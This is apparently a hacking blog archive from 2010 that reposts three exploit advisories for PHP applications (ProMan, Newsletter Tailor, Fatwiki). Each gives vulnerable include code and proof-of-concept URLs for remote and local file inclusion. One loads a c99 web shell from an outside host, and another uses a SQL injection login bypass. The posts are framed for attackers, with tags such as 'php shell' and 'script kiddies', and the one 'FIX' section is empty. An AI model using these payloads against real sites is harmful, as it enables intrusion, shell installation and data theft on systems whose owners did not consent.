ProMan <= 0.1.1 Multiple File Include Vulnerability
February 28, 2010, 2:37 am
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, LFI, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
[RFI Code]
<?php |
if (!($_GET['page'])) |
include('info.php'); |
else |
include $_GET['page'].'.php'; |
?> |
[LFI Code] |
include_once('lang/'.$_SESSION['userLang'].'/elisttasks.php'); |
if (!defined('PROMAN')) |
pexit ($l['no hack']); |
############################################################## |
PoC RFI: |
[phpRAINCHECK_path]/_center.php?page=[Shell] |
############################################################## |
PoC LFI: |
[phpRAINCHECK_path]/elisttasks.php?_SESSION[userLang]=[LFI%00] |
[phpRAINCHECK_path]/managepmanagers.php?_SESSION[userLang]=[LFI%00] |
[phpRAINCHECK_path]/manageusers.php?_SESSION[userLang]=[LFI%00] |
[phpRAINCHECK_path]/helpfunc.php?_SESSION[userLang]=[LFI%00] |
[phpRAINCHECK_path]/managegroups.php?_SESSION[userLang]=[LFI%00] |
[phpRAINCHECK_path]/manageprocess.php?_SESSION[userLang]=[LFI%00] |
[phpRAINCHECK_path]/manageusersgroups.php?_SESSION[userLang]=[LFI%00] |
others...
Comments Off
Newsletter Tailor Remote File Include Vulnerability
February 10, 2010, 3:37 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
===[ Exploit ]=== include($p.".php");
|
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt? |
[»]Note: When you update the page prompts you to log on |
[»](Auth Bypass) SQL Injection :user:' or '1=1 pass:' or '1=1 |
Then be accessed on the "sh3ll" |
|
Comments Off
Fatwiki (fwiki) Remote FiLe include RFI
February 2, 2010, 2:10 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
[ Vulnerable File ]
/datumscalc.php?kal_class_path=[INDONESIANCODER] |
/monatsblatt.php?kal_class_path=[INDONESIANCODER] |
[ BUG ] |
[!] datumscalc.php |
- require_once("$kal_class_path/kalender.class.php"); |
- require_once("$kal_class_path/feiertage.class.php"); |
- require_once("$kal_class_path/sonnemond.class.php"); |
[!] monatsblatt.php |
- require_once("$kal_class_path/kalender.class.php"); |
- require_once("$kal_class_path/feiertage.class.php"); |
- require_once("$kal_class_path/sonnemond.class.php"); |
- require_once("$kal_class_path/minikal.php"); |
[ FIX ] |
Comments Off
